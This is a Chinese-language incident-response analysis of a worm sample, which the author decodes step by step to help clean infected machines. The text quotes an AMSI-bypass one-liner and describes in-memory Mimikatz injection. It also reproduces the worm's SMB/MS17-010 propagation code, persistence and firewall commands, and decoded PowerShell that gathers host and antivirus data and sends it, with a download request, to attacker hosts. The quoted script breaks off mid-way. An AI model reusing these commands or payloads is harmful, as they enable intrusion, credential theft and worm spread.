應急響應樣本分析

摘要： 可以按照分析的清理就行，不是很難，已經全部分析完了，包括本地檔案和雲端的部分樣本。病毒不是很難，這病毒最牛逼的地方在於，自動化掃描攻擊。通過cmd開啟65531 32 33埠，來標記該機器是否已經被感染。 分析該樣本需要先看一下powershell反混淆。地址是[url] http://...

可以按照分析的清理就行，不是很難，已經全部分析完了，包括本地檔案和雲端的部分樣本。病毒不是很難，這病毒最牛逼的地方在於，自動化掃描攻擊。通過cmd開啟65531 32 33埠，來標記該機器是否已經被感染。

分析該樣本需要先看一下powershell反混淆。地址是[url] http://rvasec.com/slides/2017/Bohannon_Daniel--RVAsec_2017.pptx[/url] ，下載ppt學習一下就行

1. powershell作用。

關閉amis（防病毒介面） [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) ，具體可以參考 https://www.anquanke.com/post/id/162924

Get-Win32Types函式的作用
通過分析可知，該函式的作用時通過powershell，手工構造一個pe檔案。例如

${TYpEBUiLdER} = ${MOdULEbUIldEr}.DefineEnum(('SubSystemType'), ('Public'), [UInt16])
${tyPeBuiLDEr}.DefineLiteral(('IMAGE_SUBSYSTEM_UNKNOWN'), [UInt16] 0) | Out-Null
${tYpEbUILdER}.DefineLiteral(('IMAGE_SUBSYSTEM_NATIVE'), [UInt16] 1) | Out-Null
${TypeBuILdER}.DefineLiteral(('IMAGE_SUBSYSTEM_WINDOWS_GUI'), [UInt16] 2) | Out-Null
${TYpeBuildER}.DefineLiteral(('IMAGE_SUBSYSTEM_WINDOWS_CUI'), [UInt16] 3) | Out-Null
${TYPebUiLDer}.DefineLiteral(('IMAGE_SUBSYSTEM_POSIX_CUI'), [UInt16] 7) | Out-Null
${TYPeBUiLDER}.DefineLiteral(('IMAGE_SUBSYSTEM_WINDOWS_CE_GUI'), [UInt16] 9) | Out-Null
${TyPebuILdEr}.DefineLiteral(('IMAGE_SUBSYSTEM_EFI_APPLICATION'), [UInt16] 10) | Out-Null
${TyPEbUIlDEr}.DefineLiteral(('IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER'), [UInt16] 11) | Out-Null
${TypEBUiLdER}.DefineLiteral(('IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER'), [UInt16] 12) | Out-Null
${tyPeBUiLDer}.DefineLiteral(('IMAGE_SUBSYSTEM_EFI_ROM'), [UInt16] 13) | Out-Null
${TyPebuIlDer}.DefineLiteral(('IMAGE_SUBSYSTEM_XBOX'), [UInt16] 14) | Out-Null

具體可以參考 https://docs.microsoft.com/en-us/windows/desktop/debug/pe-format ，這裡不在詳述。

• Get-Win32Constants 函式的作用，該函式的作用是設定剛才構造的PE檔案的值。

• Get-Win32Functions函式 該函式作用是載入系統DLL中的函式，方便powershell呼叫系統函式

• Sub-SignedIntAsUnsigned函式 該函式是將有符號的int相減，並將結果轉換為無符號的int

• Add-SignedIntAsUnsigned函式 該函式是將有符號的int相加，並將結果轉換為無符號整數

• Compare-Val1GreaterThanVal2AsUInt函式 比較兩個整數是否相等

• Convert-UIntToInt函式 無符號整數轉換有符號整數

• Test-MemoryRangeValid函式 測試申請的記憶體區域是否可用

• Write-BytesToMemory函式 將bytes寫入記憶體中

• Get-ProcAddress 相當於直接呼叫GetProcAddress 函式,檢索指定的動態連結庫(DLL)中的輸出庫函式地址

• Enable-SeDebugPrivilege 啟動給定程序的sedebug許可權。該ps檔案向記憶體釋放mimikatz的pe可執行檔案後，向這個被釋放的執行緒開啟sedebug許可權，不然mimiakatz是無法執行的

• Invoke-CreateRemoteThread 呼叫其他程序的執行緒

其他一些函式，大多數是獲取PE檔案頭，倒入表 匯出表的函數了

main函式很簡單，從第2644行開始。前幾行主要作用是要執行什麼命令。pebYtes64這個變數中儲存的是mimikatz經過base64編碼後的內容。隨後判斷一下computername，去分別執行核心功能REMOtEsCRiPTBlOCK的程式碼。這個我沒看出來有什麼區別。

核心功能REMOtEsCRiPTBlOCK，的main函式在2468行。該函式的作用是向指定程序中注入mimikatz，然後在被注入的程序中執行mimikatz。推測小黑可能是在網上找到的使用指令碼，參照 https://github.com/clymb3r/PowerShell/blob/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1 ，做了一下簡單的混淆。可以看出混淆只是將關鍵字改成字串拼接或者大小寫混用。沒有實質性變化

該powershell的危害：

1. 通過mimikatz讀取系統密碼和系統可能儲存的私鑰，方便做橫向移動

2. 收集系統資訊

   除此之外，該powershell檔案中釋放的mimikatz沒有落地，只在記憶體中執行，也沒有留下後門等。

2. svchost2.exe

拖到IDA，發現這個exe的作用只是啟動一個名叫Ddriver，然後呼叫 signed int sub_40E8F0 這個函式

在這個函式中，首先呼叫 sub_40E3D0 ，然後呼叫 sub_40D280 這個函式，寫入一個 C:\\windows\\temp\\ttt.exe 這個檔案

然後回到 sub_40E3D0 ，執行 cmd /c taskkill /f /im svhost.exe /im svhhost.exe /im svvhost.exe & move /y c:\\windows\\temp\\svvhost.exe c:\\windo" "ws\\temp\\svchost.exe & del c:\\windows\\system32\\svhhost.exe & del c:\\windows\\syswow64\\svhhost.exe

就是呼叫taskkill幹掉svhost，然後刪除。而windows中正確的名字是svchost，故意是幹掉競爭對手吧。隨後將 c:\\windows\\temp\\svvhost.exe 移動到 c:\\windo" "ws\\temp\\svchost.exe ，偽造svchost。這裡推薦老哥想一下辦法，修復就行。然後又通過wmic，刪掉svhhost程序。

執行如下cmd cmd /c wmic process where \"ExecutablePath like '%%drivers%%' and name='taskmgr.exe'\" delete & wmic process where \"" "ExecutablePath like '%%drivers%%' and name='svchost.exe'\" delete & wmic process where \"ExecutablePath like '%%emp%" "%' and name='svchost.exe'\" delete

刪除windows工作管理員，幹掉可執行路徑在driver和temp中的svchost，估計是為了更好的隱藏病毒本體吧

執行如下cmd cmd /c netsh interface ipv6 install&netsh firewall add portopening tcp 65532 UDP&netsh interface portproxy add v4tov" "4 listenport=65532 connectaddress=1.1.1.1 connectport=53&netsh firewall add portopening tcp 65531 UDP2&netsh interfa" "ce portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53&netsh firewall add portopening tcp 65" "533 ShareService

解釋一下 首先安裝ipv6，然後設定防火牆開啟udp 65532，然後設定v4tov4，也就是ipv4 代理 ，具體參見 https://www.cnblogs.com/xbblogs/p/7118203.html

隨後就是設定一些亂七八糟的東西。推薦老哥重點看一下 C:\\windows\\system32中 是否有svhost這個檔案，這個是病毒哈。

然後設定計劃任務，程式碼貼出來，老哥根據這個刪除就行 cmd /c start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&(schtasks /delete /TN %s /f&scht" "asks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN %s /tr \"cmd.exe /c %s\"&schtasks /run /TN %s

然後設定登錄檔，位置貼出來，老哥刪除即可 Software\\Microsoft\\Windows\\CurrentVersion\\Run ，看一下在這個子目錄中又沒有可疑地key，應該是Driver。刪除就行

回到 sub_40E8F0 中，這裡主要是啟動任務啥的，看圖，刪除就行

scvhost2的危害：

1. 一大堆落地檔案，修改登錄檔，計劃任務，建議刪除

3. svchost1 分析

這個8MB的exe檔案一看就不是好人。先扔到IDA中，發現有python字樣。檢視string，發現py2exe。這就說明該exe有很大機率是使用python寫成的，打包為exe。我們可以使用unpy2exe這個工具還原python程式碼,參考 https://github.com/matiasb/unpy2exe 。然後還原PYC檔案就行，

vi看一下還原的檔案，其實就是一個python掃描MS17-010的指令碼。

附件是還原過後的py檔案，不允許上傳py檔案，所以我改成txt了，自行下載後後綴改成py就行

該py首先會繫結本機的60124埠。推測是做互斥體。系統中只能允許執行一個掃描工具。

程式碼從1090行開始，首先檢測如果本機存在k8h3d這個使用者，則刪除掉。然後設計掃描計劃任務，如果本機已經被感染，則讀取本地病毒檔案，如果沒有被感染，則從雲端下載病毒程式碼，然後準備開始傳播。

首先通過 wmic ntdomain get domainname ，檢測一下是否加域。如果加域的話，將域的使用者名稱和密碼加入到破解口令列表中。這個列表中儲存著常見的弱口令

然後通過 findip 這個函式，獲取主機的ip，網段一類的資訊。然後呼叫scansmb這個函式，這個函式呼叫 scan2 函式去檢測目標是否開放445。病毒會開啟65533埠，如果被掃描的機器打開了65533埠，那就說明已被感染。隨後呼叫 validate 這個函式

validate 函式主要的作用是，通過弱口令密碼錶，爆破SMB服務。爆破成功的話，將該掃描工具複製到被攻擊的機器上執行。

def validate(ip):
for u in userlist2:
for p in passlist:
if u == '' and p != '':
continue
for d in domainlist:
if PSEXEC(ee2, dl, 'cmd.exe /c c:\\windows\\temp\\svchost.exe', u, p, d).run(ip):
print 'SMB Succ!'
return

這是入侵的一種。第二種是通過findip獲取網段 ip資訊後，呼叫check_thread這個函式去打ms17-010。所以你會發現這段py程式碼其實就是python版ms17010的攻擊程式碼，參見 https://github.com/worawit/MS17-010/blob/master/zzz_exploit.py

入侵成功後，會在目標機器上執行smb_pwn函式中的程式碼。直接吧攻擊程式碼貼出來，大家就知道怎麼解決這個病毒了

def smb_pwn(conn, arch):
smbConn = conn.get_smbconnection()
if os.path.exists('c:/windows/system32/svhost.exe'):
eb = 'c:\\windows\\system32\\svhost.exe'
if os.path.exists('c:/windows/SysWOW64/svhost.exe'):
eb = 'c:\\windows\\SysWOW64\\svhost.exe'
if os.path.exists('c:/windows/system32/drivers/svchost.exe'):
eb = 'c:\\windows\\system32\\drivers\\svchost.exe'
if os.path.exists('c:/windows/SysWOW64/drivers/svchost.exe'):
eb = 'c:\\windows\\SysWOW64\\drivers\\svchost.exe'
service_exec(conn, 'cmd /c net share c$=c:')
smb_send_file(smbConn, eb, 'c', '/installed.exe')
if os.path.exists('c:/windows/temp/svvhost.exe'):
ee = 'c:\\windows\\temp\\svvhost.exe'
if os.path.exists('c:/windows/temp/svchost.exe'):
ee = 'c:\\windows\\temp\\svchost.exe'
smb_send_file(smbConn, ee, 'c', '/windows/temp/svchost.exe')
bat = 'cmd /c c:\\installed.exe&c:\\installed.exe&echo c:\\installed.exe >c:/windows/temp/p.bat&echo c:\\windows\temp\\svchost.exe >>c:/windows/temp/p.bat&echo netsh interface ipv6 install >>c:/windows/temp/p.bat &echo netsh firewall add portopening tcp 65532 DNS2>>c:/windows/temp/p.bat&echo netsh interface portproxy add v4tov4 listenport=65532 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat&echo netsh firewall add portopening tcp 65531 DNSS2>>c:/windows/temp/p.bat&echo netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat&echo if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\\Microsoft\\windows\\Bluetooths" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F) else start /b sc start Schedule^&ping localhost^≻ query Schedule^|findstr RUNNING^&^&^(schtasks /delete /TN Autocheck /f^&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?p%COMPUTERNAME%"^&schtasks /run /TN Autocheck^) >>c:/windows/temp/p.bat&echo net start Ddriver >>c:/windows/temp/p.bat&echo for /f%%i in (\'tasklist ^^^| find /c /i "cmd.exe"\'^) do set s=%%i >>c:/windows/temp/p.bat&echo if %s% gtr 10 (shutdown /r) >>c:/windows/temp/p.bat&echo net user k8h3d /del >>c:/windows/temp/p.bat&echo del c:\\windows\\temp\\p.bat>>c:/windows/temp/p.bat&cmd.exe /c c:/windows/temp/p.bat'
service_exec(conn, bat)

危害：

1. 自動化掃描攻擊，主動攻擊區域網中其他的主機

下面說一下怎麼清除這個病毒：

自己看看smb_pwn函式中的程式碼，刪除相關落地的檔案就行

下面說一下雲端程式碼，首先去 http://v.beahh.com/v 下載powershell程式碼，該程式碼經過gzinflate(base64_decode編碼，所以寫一段php解密，解密後的內容如下

.( $Env:COMSpEc[4,15,25]-jOIn'')( ((("{4}{28}{19}{23}{15}{46}{38}{27}{56}{47}{10}{62}{35}{29}{59}{16}{60}{0}{34}{55}{37}{13}{57}{52}{6}{50}{18}{61}{2}{36}{43}{45}{53}{22}{26}{31}{51}{1}{49}{21}{20}{54}{14}{7}{5}{40}{17}{58}{25}{30}{3}{39}{42}{24}{63}{11}{44}{8}{41}{32}{48}{12}{9}{33}" -f'JUpnV+WdSzp2k+','fYruj1+8On39Ff2ieKsA1nmzVgFcFtkCc8Sz3dTE1iti1d9/796yuKIJolc','BPRvR//YReMbxC','L','Invoke-Expression {1}(New-','/w/yMT','34O1lbfraf4uL8t83ozxm+3gcFkVNFdFuV','qzK8Wo1+2lwJLFOj2cUWFypE6P9Ps+e/hT4Zud++tknKWNrZENYH9y0FNb/Rfn2LRTo+vpimZ1fLKvZev4DZn0CYbm','/','ion.CompressionMode]::Decompress)), [Text.Encoding]:','N9k9mr86ySXmapveqn/x9jus03Uo/Su+kdx7e+/6rbD793vc/f3H26s3r743u7N2XTz452Ndf7uknW1un0+NyldfjOx//zMejj19effWx99Hv9vHozsPdXX1p','/S+/9/HW1p2','0})))), [IO.Compress','7O/rd2aF63Vnlevn706PuzLK/nb8Y0Qv2N5qC5fv09','J5','rt]::Fr','qGf5dvaQPty6WRd2+5q+uqqf0+','3oIFNKv2ydf/ku','XbQYz6al',' IO.Compr','yR','yF+pYlui/m0Pn79pfb0miaxzWiOvuSuvqu8YPoBuT9riwlAfEL','1/5z7Nz','ession.DeflateStream ({1}(New-Object IO.MemoryStream (,{1}([Conve','a2sX8D7G85ra/OTrk/TLZ3d','bJHxfNOCQT9XqDQYvE','Thv','HYBxJliUmL23Ke39K9UrX4HShCIBgE','Object IO.StreamReader ({1}(New-Object','66brfTeZutrlYvP/7k43SRt2fbV/mLH0OTX3xdt/0Xfwl/d4c62JtlVbmk16','1fv7jOylVTwFBN1zOiR7Oui58s2uWxYZQ9YvVlfn','s9lqPfvpNf39CY8/bx9dLn','v0428tZq++9fGd8TL7Iv/evdHu7mjv+9s/X',':ASCII)).ReadToEnd();
','LS','22z6S/B7Xhbnab','nP1sltEHwo','np8VW+vPtwfO/BeH9nd7z3YPfu3Uertp0D/mepPw7B6c','{0}7b0','dFtCgr2m','MPdErL801kHhyj1DnN19ZVM8fcvqd33zGsdtD/5BN+mh+1yXZ2MtVFbskqTb3bQFf22VVfn+tIuDeCCxJ','n+vd3vPT17Xp7Om9/tk+/T74X8Tk7YGG7YYfoL062ti8','q2qqqiTzZqgGALisRio0lx52T4y9IH1Hf2epdrk2rbfpR5g3RHF/XOanSb2+nl83J9qKqn9HEXC6rE0zJbto2dXG+ne6mq+Lt','EdZlG4HxOze4yoTHjnzh0VBhaK7bbJ2620rZbbW+lsmW2nwIOwX','Pf++PP','ILr168wx/lyO23','omBase64String(','51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8imvz','RUvPv74Trq1/Z0vixf0Unpx2m6ftaeLNP3JrC6OnzzPHxm/7s74J7PnX51+D2Mej7e3btV6XJ6+uHgzv5N+P73zGyf/Dw=={','xR8Xiuyp4UFL0f0DhV2cK5yIrz10He/hTv','plY/4+JcIsqum2R3lCLXhJ/l2sm/Ed+gcscbHMS0OP1TZA6Nt5vW6y/AsmTt7UhEa9n','MZJtFUCUIwDU0Cpv+CvgCX0g9m1FlZDTEqNfks3fOIGwICFGBUlrNhVu+8','Ht5ZLdrf','w160YCWiGvLS1dV50pG','Ihdujepf36Zftr3myYrT4yEWTCCKahLABjYZUZYMvjLjD+YZgvzCf36C6U5kVOoD0r2OJK+vQB/84i/L6rxe2g','7r/PV2m3++JXDu/R7Lqv','yTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O','aS7/','ny3PxvkiW47v','6','fhOu8yL8mSSf3fc5i/Sdpr/9ORL9LKV/t6nZz8mfeVNmTvQ9/T9mQ+0MR8OQAQOAdDr/C29n36S5j8oGvmNgH2Gv34h/UJ/Nus2a1+P78jP9Lqt81VVv9xO27p6nd','cX8ROj1mZkBQ4PdjTSgzjpkAE90+q','z/62c9B7fe9ht9edHdP8U/vbAwPCe3O/i+/HX+z/Xj4Wv3GC/37JL55P','TSGC2aPMLYCC82uE44StBTr+id8Jv'))-f[ChAR]39,[ChAR]36) )

然後參考fireeye的一篇關於講解powershell混淆的文章，寫出如下py指令碼解密

s = """JUpnV+WdSzp2k+','fYruj1+8On39Ff2ieKsA1nmzVgFcFtkCc8Sz3dTE1iti1d9/796yuKIJolc','BPRvR//YReMbxC','L','Invoke-Expression {1}(New-','/w/yMT','34O1lbfraf4uL8t83ozxm+3gcFkVNFdFuV','qzK8Wo1+2lwJLFOj2cUWFypE6P9Ps+e/hT4Zud++tknKWNrZENYH9y0FNb/Rfn2LRTo+vpimZ1fLKvZev4DZn0CYbm','/','ion.CompressionMode]::Decompress)), [Text.Encoding]:','N9k9mr86ySXmapveqn/x9jus03Uo/Su+kdx7e+/6rbD793vc/f3H26s3r743u7N2XTz452Ndf7uknW1un0+NyldfjOx//zMejj19effWx99Hv9vHozsPdXX1p','/S+/9/HW1p2','0})))), [IO.Compress','7O/rd2aF63Vnlevn706PuzLK/nb8Y0Qv2N5qC5fv09','J5','rt]::Fr','qGf5dvaQPty6WRd2+5q+uqqf0+','3oIFNKv2ydf/ku','XbQYz6al',' IO.Compr','yR','yF+pYlui/m0Pn79pfb0miaxzWiOvuSuvqu8YPoBuT9riwlAfEL','1/5z7Nz','ession.DeflateStream ({1}(New-Object IO.MemoryStream (,{1}([Conve','a2sX8D7G85ra/OTrk/TLZ3d','bJHxfNOCQT9XqDQYvE','Thv','HYBxJliUmL23Ke39K9UrX4HShCIBgE','Object IO.StreamReader ({1}(New-Object','66brfTeZutrlYvP/7k43SRt2fbV/mLH0OTX3xdt/0Xfwl/d4c62JtlVbmk16','1fv7jOylVTwFBN1zOiR7Oui58s2uWxYZQ9YvVlfn','s9lqPfvpNf39CY8/bx9dLn','v0428tZq++9fGd8TL7Iv/evdHu7mjv+9s/X',':ASCII)).ReadToEnd();
','LS','22z6S/B7Xhbnab','nP1sltEHwo','np8VW+vPtwfO/BeH9nd7z3YPfu3Uertp0D/mepPw7B6c','{0}7b0','dFtCgr2m','MPdErL801kHhyj1DnN19ZVM8fcvqd33zGsdtD/5BN+mh+1yXZ2MtVFbskqTb3bQFf22VVfn+tIuDeCCxJ','n+vd3vPT17Xp7Om9/tk+/T74X8Tk7YGG7YYfoL062ti8','q2qqqiTzZqgGALisRio0lx52T4y9IH1Hf2epdrk2rbfpR5g3RHF/XOanSb2+nl83J9qKqn9HEXC6rE0zJbto2dXG+ne6mq+Lt','EdZlG4HxOze4yoTHjnzh0VBhaK7bbJ2620rZbbW+lsmW2nwIOwX','Pf++PP','ILr168wx/lyO23','omBase64String(','51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8imvz','RUvPv74Trq1/Z0vixf0Unpx2m6ftaeLNP3JrC6OnzzPHxm/7s74J7PnX51+D2Mej7e3btV6XJ6+uHgzv5N+P73zGyf/Dw=={','xR8Xiuyp4UFL0f0DhV2cK5yIrz10He/hTv','plY/4+JcIsqum2R3lCLXhJ/l2sm/Ed+gcscbHMS0OP1TZA6Nt5vW6y/AsmTt7UhEa9n','MZJtFUCUIwDU0Cpv+CvgCX0g9m1FlZDTEqNfks3fOIGwICFGBUlrNhVu+8','Ht5ZLdrf','w160YCWiGvLS1dV50pG','Ihdujepf36Zftr3myYrT4yEWTCCKahLABjYZUZYMvjLjD+YZgvzCf36C6U5kVOoD0r2OJK+vQB/84i/L6rxe2g','7r/PV2m3++JXDu/R7Lqv','yTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O','aS7/','ny3PxvkiW47v','6','fhOu8yL8mSSf3fc5i/Sdpr/9ORL9LKV/t6nZz8mfeVNmTvQ9/T9mQ+0MR8OQAQOAdDr/C29n36S5j8oGvmNgH2Gv34h/UJ/Nus2a1+P78jP9Lqt81VVv9xO27p6nd','cX8ROj1mZkBQ4PdjTSgzjpkAE90+q','z/62c9B7fe9ht9edHdP8U/vbAwPCe3O/i+/HX+z/Xj4Wv3GC/37JL55P','TSGC2aPMLYCC82uE44StBTr+id8Jv"""
s = s.split("','")

a= ['4', '28', '19', '23', '15', '46', '38', '27', '56', '47', '10', '62', '35', '29', '59', '16', '60', '0', '34', '55', '37', '13', '57', '52', '6', '50', '18', '61', '2', '36', '43', '45', '53', '22', '26', '31', '51', '1', '49', '21', '20', '54', '14', '7', '5', '40', '17', '58', '25', '30', '3', '39', '42', '24', '63', '11', '44', '8','41', '32', '48', '12', '9', '33']
result = ""
for i in a:
result += s[int(i)]

print result

結果是

Invoke-Expression {1}(New-Object IO.StreamReader ({1}(New-Object IO.Compression.DeflateStream ({1}(New-Object IO.MemoryStream (,{1}([Convert]::FromBase64String({0}7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8imvzN9k9mr86ySXmapveqn/x9jus03Uo/Su+kdx7e+/6rbD793vc/f3H26s3r743u7N2XTz452Ndf7uknW1un0+NyldfjOx//zMejj19effWx99Hv9vHozsPdXX1pz/62c9B7fe9ht9edHdP8U/vbAwPCe3O/i+/HX+z/Xj4Wv3GC/37JL55P22z6S/B7Xhbnab66brfTeZutrlYvP/7k43SRt2fbV/mLH0OTX3xdt/0Xfwl/d4c62JtlVbmk166qGf5dvaQPty6WRd2+5q+uqqf0+fhOu8yL8mSSf3fc5i/Sdpr/9ORL9LKV/t6nZz8mfeVNmTvQ9/T9mQ+0MR8OQAQOAdDr/C29n36S5j8oGvmNgH2Gv34h/UJ/Nus2a1+P78jP9Lqt81VVv9xO27p6ndJUpnV+WdSzp2k+LS7r/PV2m3++JXDu/R7Lqvnp8VW+vPtwfO/BeH9nd7z3YPfu3Uertp0D/mepPw7B6c7O/rd2aF63Vnlevn706PuzLK/nb8Y0Qv2N5qC5fv09aS7/Ht5ZLdrf34O1lbfraf4uL8t83ozxm+3gcFkVNFdFuVplY/4+JcIsqum2R3lCLXhJ/l2sm/Ed+gcscbHMS0OP1TZA6Nt5vW6y/AsmTt7UhEa9nXbQYz6alcX8ROj1mZkBQ4PdjTSgzjpkAE90+qBPRvR//YReMbxCnP1sltEHwoEdZlG4HxOze4yoTHjnzh0VBhaK7bbJ2620rZbbW+lsmW2nwIOwXILr168wx/lyO23w160YCWiGvLS1dV50pG1/5z7NzThvs9lqPfvpNf39CY8/bx9dLnMZJtFUCUIwDU0Cpv+CvgCX0g9m1FlZDTEqNfks3fOIGwICFGBUlrNhVu+8fYruj1+8On39Ff2ieKsA1nmzVgFcFtkCc8Sz3dTE1iti1d9/796yuKIJolcxR8Xiuyp4UFL0f0DhV2cK5yIrz10He/hTvyF+pYlui/m0Pn79pfb0miaxzWiOvuSuvqu8YPoBuT9riwlAfELyRIhdujepf36Zftr3myYrT4yEWTCCKahLABjYZUZYMvjLjD+YZgvzCf36C6U5kVOoD0r2OJK+vQB/84i/L6rxe2gJ5qzK8Wo1+2lwJLFOj2cUWFypE6P9Ps+e/hT4Zud++tknKWNrZENYH9y0FNb/Rfn2LRTo+vpimZ1fLKvZev4DZn0CYbm/w/yMTMPdErL801kHhyj1DnN19ZVM8fcvqd33zGsdtD/5BN+mh+1yXZ2MtVFbskqTb3bQFf22VVfn+tIuDeCCxJ3oIFNKv2ydf/kuny3PxvkiW47vbJHxfNOCQT9XqDQYvE1fv7jOylVTwFBN1zOiR7Oui58s2uWxYZQ9YvVlfnLdFtCgr2mq2qqqiTzZqgGALisRio0lx52T4y9IH1Hf2epdrk2rbfpR5g3RHF/XOanSb2+nl83J9qKqn9HEXC6rE0zJbto2dXG+ne6mq+Lta2sX8D7G85ra/OTrk/TLZ3dTSGC2aPMLYCC82uE44StBTr+id8Jv/S+/9/HW1p2Pf++PP/n+vd3vPT17Xp7Om9/tk+/T74X8Tk7YGG7YYfoL062ti8v0428tZq++9fGd8TL7Iv/evdHu7mjv+9s/XRUvPv74Trq1/Z0vixf0Unpx2m6ftaeLNP3JrC6OnzzPHxm/7s74J7PnX51+D2Mej7e3btV6XJ6+uHgzv5N+P73zGyf/Dw=={0})))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();

然後我們繼續解碼，發現是如下內容

seT-VaRIablE3oVYAr( " ) )93]Rahc[]GNIRTS[,)25]Rahc[+84]Rahc[+35]Rahc[((EcAlper.)'|','PwU'(EcAlper.)'$',)911]Rahc[+211]Rahc[+08]Rahc[((EcAlper.)29]Rahc[]GNIRTS[,)001]Rahc[+601]Rahc[+711]Rahc[((EcAlper.)43]Rahc[]GNIRTS[,'M4K'(EcAlper.)'
}{hctac}
elif epyt- htapwpP'+' metI-weN
{yrt
}{hctac}
}
)M4K2daoln'+'wod'+'wpPM4K(gnirtSdaolnwoD'+'.)tneilCbeW.teN tcejbO-weN( XEI
{esle}
)M4K3daolnwodwpPM4K(gnirtsdaolnwod.)tneilCbeW.teN tcejbO-'+'weN( XEI
yekwpP + eziswpP + M4K=ezis&M4K + sutatS.)sutatS ytreporP- troS PwU revirdD ecivreS-teG( + M4K3?nosj.wen/9.37.401.271//:ptthM4K = 3daolnwodwpP
)04*0001(peelS::]daerhT.gnidaerhT.metsyS[
;)pmt_daolnwodwpP(etucexellehs.cexewpP
;noitacilppa.llehs '+'moc- tcejbO-weN = cexewpP
mus.)mus- htgnel ytreporp- '+'tcejbO-erusaeM PwU esrucer- pmt_daolnwodwpP metIdlihC-teG( = eziswpP
)01*0001(peelS::]daerhT.gnidaerh'+'T.metsyS[
)M4Kpmt_daolnwodwpPM4K,M4Kdaolnwo'+'dwpPM4K(eliFda'+'olnwoD.)tneilCbeW.teN.metsyS'+' tcejbO-weN(
{)))htapwpP htap-tset( ton-( dna- )M4Kgninn'+'uRM4K en- s'+'utatS.)sutatS ytreporP- troS PwU revir'+'dD ecivreS-teG(((fi
{yrt
405exe.etadpudju405+M4Kpmet:vnewpPM4K = pmt_dao'+'lnwodwpP
yekwpP + M'+'4K3?'+'nosj.dlo/9.37.401.271//:ptthM4K '+'= 2daolnwodwpP
yekwpP + M4K3?exe.lld/9.37.401.271//:ptthM4K = daolnwodwpP
EM'+'ANRESU'+':vnewpP + M4K=resu&M4K + niamoD.)metsysretupmoc_23niw tc'+'ejbOimW-teG( +'+' '+'M4K=niamod&M4K + galfwpP + M4K=2galf&M4K + erutcetihcrASO.)metsySgnitarepO_23niW tcejbOimW-teG(+M4K=tib&M4K+noisrev.)metsySgn'+'itare'+'pO_23niW ssalC- tcejbOimW-teG(+'+'M4K'+'=rev&M4K+vawpP+M4K=va&M4K+camwpP+M4K=cam&M4K'+' = yekwpP
htapwpP htap-tset = ga'+'lfwpP]gnirts[
M4Kgol.ppdj'+'udjupmet:vnewpPM4K = htapwpP
}{hctac}
}
405YFDZ'+'405 =+ vawpP
{)M4Kgni'+'nnuRM4K qe- sutatS.)sutatS ytreporP- troS PwU uygnafgnoduhz eciv'+'reS-teG((fi
{yrt
}
svawpP = vawpP
{esle}
}
M4KP'+'wUM4K + ]vwpP[svawpP =+ vawpP
{)++vwpP ;tnuoC.svawpP tl- '+'vwpP ;0 = vwpP(rof
{)1- tg- )405tcejbO405(fOxednI.eman.)(epyTt'+'eG.svawpP(fi
emaNyalpsid.)tcudorPsuriVitnA ssalC- 2retneCytiruceSdjutoor ecapsemaN- tcejbOimW-teG( = svawpP
)CAM dn'+'apxe- tcejbo-tcelesPwUCAM redaeH- vsC-morFtrevnoC PwU1 tsrif- 1 pikS- tcejbO-tcel'+'eSPwUVSC OF/ c'+'amteg( = camwpP]gnirts[
M4KM4K = svawpP]gnirts'+'[
M4KM4K = vawpP]gnirts['(()'X'+]31[DILlEhs$+]1[DiLlEhs$ ( . " ); & ((gv '*mdR*').naMe[3,11,2]-joiN'') (-JOiN (gEt-ItEmVariABLe:3oVYAr).VaLUE[- 1 ..-((gEt-ItEmVariABLe:3oVYAr).VaLUE.lENgTh) ] )

重點看這裡，我也看不懂，大致意思是將字串反轉，OK，那我們試一下

結果如下

$av = ""
$avs = ""
$mac = (getmac /FO CSV|Select-Object -Skip 1 -first 1| ConvertFrom-Csv -Header MAC|select-object -expand MAC)
$avs = (Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct).displayName
if($avs.GetType().name.IndexOf('Object') -gt -1){
for($v = 0; $v -lt $avs.Count; $v++){
$av += $avs[$v] + "|"
}
}else{
$av = $avs
}
try{
if((Get-Service zhudongfangyu | Sort -Property Status).Status -eq "Running"){
$av += 'ZDFY'
}
}catch{}
$path = "$env:temp\\pp.log"
[string]$flag = test-path $path
$key = "&mac="+$mac+"&av="+$av+"&ver="+(Get-WmiObject -Class Win32_OperatingSystem).version+"&bit="+(Get-WmiObject Win32_OperatingSystem).OSArchitecture + "&flag2=" + $flag + "&domain=" + (Get-WmiObject win32_computersystem).Domain + "&user=" + $env:USERNAME
$download = "http://172.104.73.9/dll.exe?3" + $key
$download2 = "http://172.104.73.9/old.json?3" + $key
$download_tmp = "$env:temp"+'\update.exe'
try{
